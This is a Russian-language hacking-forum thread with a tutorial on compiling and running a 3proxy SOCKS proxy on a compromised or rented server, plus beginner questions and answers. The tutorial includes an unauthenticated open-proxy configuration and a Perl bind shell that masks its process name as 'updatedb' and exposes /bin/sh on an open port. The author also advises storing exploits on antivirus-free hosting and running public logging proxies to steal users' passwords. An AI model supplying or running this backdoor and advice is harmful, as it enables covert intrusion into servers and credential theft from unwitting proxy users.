• XSS.stack #1 – первый литературный журнал от юзеров форума

Ставим Socks своими руками

Wo0F

(L3) cache
Пользователь
Регистрация
16.04.2005
Сообщения
154
Реакции
1
Вы наверно не раз сталкивались с необходимостью сделать своё пребывание в сети анонимным. Вы наверное уже знаете что наиболее простым и дешевым способом анонимизировать себя в сети является работа через прокси сервер/ы. И каждый более-менее заботящийся о своей безопасности юзер работает через прокси. Рассказывать что такое прокси и какие они бывают я не буду.

Ты юзаешь прокси? Уверен что да. А ты никогда не задумывался откуда они берутся и для чего их создают а? Подумай сам, ведь прокси генерируют огромный траффик. Кому нада за него платить? А вот кому. Большинство публичных прокси серверов устанавливаются либо хакерами, либо спецслужбами для поимки первых. А поймать хакера, заюзавшего КГБ’шный проксик очень просто. Допустим хакер взломал сервер банка, выкачал интересующую его инфу, после чего админ заподозрил взлом, админ покопался в логах нашел айпишник хакера (точнее айпишник проксика через который работал хакер) и побежал премиком на Лубянку (предположим %). Сотрудники отдела “К” проверили по своей базе этот самый IP и увидили что это айпишник ихнего проксика. Теперь дело за малым, сотрудники ковыряют логии на сервере где установлен их проксик. ВСЁ, ХАКЕР ПОД КОЛПАКОМ!
Мы рассмотрели первый вариант, теперь немного расскажу о втором.
Представь такую ситуацию. Я борзый падопак-хакер поставивший свой проксик, и конечно я не забыл включить у своего проксика функцию ведения логов. После чего я щедро оставляю свой проксик в паблике и наивные юзере пользуются ими. Наверное у тебя возник вопрос: а нафига мне ему это нада, чё он будет делать с этими логами? Да всё просто, весь трафик проходящий через мой проксик будет записываться в лог-файл. Ты залогинился под своим паролем в аське, твой пароль записался в лог моего проксика %).
Стрёмно получается да? Так вот чтоб с тобой не произошло ничего из вышеизложенного я и написал эту стаью (признаюсь тема заеженна по потери пульса). Выход один- ставить собственный проксик.
Я расскажу об установке наиболее популярного (популярного по праву) socks прокси сервера под названием 3proxy от ЗАРАЗЫ. Рульность этого проксика заключается в том, что его можно установить даже с nobody правами!
Итак начнём:

Нам понадобятся:
1. Руки прямые - 2 шт.
2. архвив 3proxy
3. Шелл.

Что такое шелл и как с ним работать я тоже не буду объяснять, не об этом моя статья. 3proxy можно скачать с офсайта www.security.nnov.ru/soft/3proxy . Шелл выбирать тебе, либо это будет похаканный тобой серв, либо шелл на платном хостинге. Почему на платном? Да потому что ни один бесплатный хостер не позволит тебе установить проксик, проверял сам лично (хотя если найдшь такое чудо, незабудь поделиться со мной :)) Надеюсь о том как забидить шелл на уязвимой тачке рассказывать не нужно (но всё таки если у тебя с этим проблемы, пиши, накатаю продолжение %).
Итак, ты на шелле. Качай архивчик с 3proxy и приступим к процессу установки (для танкистов поясняю, скачать можно любым даунлоадером установленным на серве, если же даунлоадера ты не нашел, заливай через FTP).
Как я уже говорил закачку файла можно произвести командой wget http://site.ru/file.tar.gz . Но иногда можно столкнуться с отсутствием утилиты wget на сервере. Но это не проблема, т.к. помимо wget существуют другие консольные даунлоадеры, например curl и fetch. Работют с ними по тому же принципу что и с wget, например ты нашел на серве curl, командуй: curl http://site.ru/file.tar.gz .
А что делать если на серванте вообще нет даунлоадера !? К сожалению бывает и такое. Но вы ход есть всегда :). Ведь если у тебя есть шелл, ты можешь залить файлы на него через FTP. Вот как это реализовать:
Вообще если ты занимаешься сетевым взломом, то у тебя наверняка есть свой склад сплойтов и прочего жобра на каком либо хостинге. Если же ты до сих пор не зарегистрировал аккаунт на бесплатном хостинге, беги регистрировать, например на www.newmail.ru, имхо на этом хостинге нет антивирей и для хранения эксплойто и другой лабуды он подходит лучше всего.
Итак ты зарегистрировал свой аккаунт на newmail.ru, тебе дали ящик и место под сайт в придачю. Заливай на свой свежезареганный сайт 3proxy. Теперь собственно приведу пример того, как закачать на шелл нужный нам сайт через FTP (всё что после # это мои пояснения, их писать не нужно %):

echo open ftp.newmail.ru 21>mpg # соеденяемся с FTP-сервом
echo yoursite.nm.ru>>mpg # здесь адрес твоего сайта
echo password>>mpg # пароль к твоему аккаунту
echo bin>>mpg # заходим на сайт (чёта такое, точно незнаю %)
echo get 3proxy.tar.gz >>mpg # сливаем с сайта архивчик с 3proxy
echo bye>>mpg # закрываем соединение
ftp -s:mpg
Итак скачаллось, теперь разархивируй архив. В папке с разархивированным проксиком скомандуй make –f Makefile.unix и жди пока процесс компиляции модулей завершится. Если ты всё сделаешь правильно (и если нормальный шелл), то появится один бинарник с названием 3proxy. Всё. Ты собрал свой проксик, теперь его нужно отконфигурировать. Создаём в той же папке где и бинарник 3proxy файл 3proxy.cfg .
Создал? Молодец, теперь вбиваем настройки, их немного.
Пиши в файле конфига следующее (всё что после # в конфиг добавлять ненужно, ето мои коментарии %) :
nserver 127.0.0.1 # адрес DNS для автоматического соединения
auth none # отключаем авторизацию =))
allow * # рашзрешение на использование проксика с любого адреса.
socks –p7855 # номер порта нашего сокса.
internal 127.0.0.1 # внутренний IP
log /dev/null # сюда будут записываться логи. Не волнуйся сюда можно только записывать инфу, прочесть её невозможно :).
Если ты всё набрал, нажми ctrl+c , конфиг запишется в ту директория в которой ты его создавал.
Вот впринципе и всё по установке. Чтобы запустить собранный сокс скомандуй ./3proxy 3proxy.cfg .

Рассмотрим пример конфига, в котором мы установим авторизацию на нашем соксе:
nserver 127.0.0.1 # адрес DNS для автоматического
users nick:CL:pass # создаём юзера с ником nick и паролем pass 8)
auth strong # указываем необходимость авторизации !
allow * # рашзрешение на использование проксика с любого адреса.
socks –p7855 # номер порта нашего сокса.
internal 127.0.0.1 # внутренний IP
log /dev/null # сюда будут записываться логи. Не волнуйся сюда можно только записывать инфу, прочесть её невозможно
В конфиге воявляется новая строчка users nick:CL:pass , этой строкой ты создаёшь юзера (nick и pass конечно нужно поменять на свои %). Юзеров можно создать несколько, делается это одинаково. И незабудь изменить строчку auth none на auth strong !

Необходимо забиндить (тоесть открыть) порт для 3proxy.

Скрипт:
#!/usr/bin/perl
$port = 32767;
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1){
accept(X, S);
unless(fork)
{ open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
} close X;}

Сохраняем код с файл с расширение .pl , например bind.pl
Заливаем его на шелл.
Выполняем на шелле команду perl bind.pl
После проделанных действий на шелле откроется 32767 порт.
Нам прийдётся подкорректировать в конфиге 3proxy порт, в строчке socks –p7855 меняем с 7855 на 32767.


З.Ы. А ведь ты можешь помимо собственного использования заюзать socks в своих мерзких делишках :). Подумай сам, что тебе мешает создать отдельный проксик (как всё умные мерзавци-хакеры :) и щедро раздавать его направо и налевло, незабыв при этом указать для логов не дерикторию /dev/null , а в более подходящее для твоих гадких делишек место :).

Удачи...
 
make[1]: Leaving directory `/home/fu*kedhost/src'
и выходит. Что не так?
эээ...даже конкретно и не знаю, не сталкивался с этим, скорее всего на данном серве нет каких либо сервисов чтоб установить 3proxy. А конкретно после какого действия появляется это сообщение?

сделаи видео лучше
Будет время и возможность, сделаю, хотя надо ли ? Итак всё подробно расписал :).
В винде соксы можно ставить гораздо проще.
Нужно взять 2 проги SocksChain и SocksCap Control(полечить перед использованием)
С помощью первой ищем и создаем цепочку соксов. Во вторую переносим нужные нам приложения(експлоер например) и запускаем его из этого окна.
Возможна цепочка от 2 до 5 и более соксов.
Анонимность гарантирована!)
:D
Хаха, ты неправ.
Таким способом ты не ставишь прокси, а просто SocksChain берёт список соксов с какого либо фрии сайта (скорее всего).
данным способом ты просто формируем цепь из нескольких соксов. Не советую использовать для поиска соксов встроенный в SocksChain сканер, он находит очень отстойный проксики, у коорых низкая скорость и они не всегда являются действительно анонимными.
Я же рассказал как именно поставить сокс на взломанном или арендуемом сервере.
 
Нравиться мне этот форум.........
Что такое шелл и как с ним работать я тоже не буду объяснять, не об этом моя статья. 3proxy можно скачать с офсайта www.security.nnov.ru/soft/3proxy . Шелл выбирать тебе, либо это будет похаканный тобой серв, либо шелл на платном хостинге. Почему на платном? Да потому что ни один бесплатный хостер не позволит тебе установить проксик, проверял сам лично (хотя если найдшь такое чудо, незабудь поделиться со мной ) Надеюсь о том как забидить шелл на уязвимой тачке рассказывать не нужно (но всё таки если у тебя с этим проблемы, пиши, накатаю продолжение %).
Я в этом делитант, так што прошу объяснить.

Итак, ты на шелле. Качай архивчик с 3proxy и приступим к процессу установки (для танкистов поясняю, скачать можно любым даунлоадером установленным на серве, если же даунлоадера ты не нашел, заливай через FTP).
Очень часто встречал такое выражение: закачивай через FTP. Што это значит и как это делается.

Как я уже говорил закачку файла можно произвести командой wget http://site.ru/file.tar.gz . Но иногда можно столкнуться с отсутствием утилиты wget на сервере. Но это не проблема, т.к. помимо wget существуют другие консольные даунлоадеры, например curl и fetch. Работют с ними по тому же принципу что и с wget, например ты нашел на серве curl, командуй: curl http://site.ru/file.tar.gz .
wget, curl и fetch. Што это такое. Можно по-подробнее.

echo open ftp.newmail.ru 21>mpg      #  соеденяемся с FTP-сервом
echo yoursite.nm.ru>>mpg        #  здесь адрес твоего сайта
echo password>>mpg                      #  пароль к твоему аккаунту 
echo bin>>mpg            #  заходим на сайт (чёта такое, точно незнаю %)   
echo get 3proxy.tar.gz >>mpg          #  сливаем с сайта архивчик с 3proxy                   
echo bye>>mpg                                  #  закрываем соединение
ftp -s:mpg
Што это за команды, откуда они взялись (можно ссылочку) и куда они вводятся.

В папке с разархивированным проксиком скомандуй make –f Makefile.unix и жди пока процесс компиляции модулей завершится.

make –f Makefile.unix Што это за команда.

Ну, я же говорил, што я полный делитант.
 
psevdo
Очень часто встречал такое выражение: закачивай через FTP. Што это значит и как это делается.
Это когда ты имеешь логин/пароль от ФТП, устанавливаешь какой-нибудь CuteFTP или TotalCommander, прописываешь в опциях соединения настройки (логин/пароль), соединяешься, получаешь каталог файлов/папок и можешь закачивать/скачивать все что угодно (да и вообще любые операции проводить (в разумных пределах).
А описание команд *nix-систем ты можешь взять здесь. Как раз для таких дилетантов, как ты, создавалось.
 
Что такое шелл и как с ним работать я тоже не буду объяснять, не об этом моя статья. 3proxy можно скачать с офсайта www.security.nnov.ru/soft/3proxy . Шелл выбирать тебе, либо это будет похаканный тобой серв, либо шелл на платном хостинге. Почему на платном? Да потому что ни один бесплатный хостер не позволит тебе установить проксик, проверял сам лично (хотя если найдшь такое чудо, незабудь поделиться со мной ) Надеюсь о том как забидить шелл на уязвимой тачке рассказывать не нужно (но всё таки если у тебя с этим проблемы, пиши, накатаю продолжение %).

Шелл это оболочка удалённого компьютера, тоесть это сервер которым ты управляешь со своей машины. Это может быть любой сервер сети, например сервер взломанного сайта.

wget, curl и fetch. Што это такое. Можно по-подробнее.
Это даунлоадеры. которые чаще всего встречаются на *nix системах.

echo open ftp.newmail.ru 21>mpg # соеденяемся с FTP-сервом
echo yoursite.nm.ru>>mpg # здесь адрес твоего сайта
echo password>>mpg # пароль к твоему аккаунту
echo bin>>mpg # заходим на сайт (чёта такое, точно незнаю %)
echo get 3proxy.tar.gz >>mpg # сливаем с сайта архивчик с 3proxy
echo bye>>mpg # закрываем соединение
ftp -s:mpg

Это команды предназначенные для работы с FTP. Вводятся на шелле.

make –f Makefile.unix Што это за команда.

Компиллируем 3proxy на шелле.



Послушай psevdo, твоими знаниями ваще не стоит компьютер включать :), шутка.
Ты бы поискал инфы в инете по иньтересующим тебя вопросам, имхо если ты незнаешь даже того, что такое FTP.


Удачи
 
make[1]: Leaving directory `/home/fu*kedhost/src'
и выходит. Что не так?

Leaving directory это нормально, если чтото нетак он должен вывести Error.
Если ошибка есть, то покажи сдесь что пишет перед ней, а также полазий в фале config.log, но недумаю что ты там чтолибо поймеш :)

По запросу "цепочка соксов" эта страница первая в Google, поздравляю товарищи.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх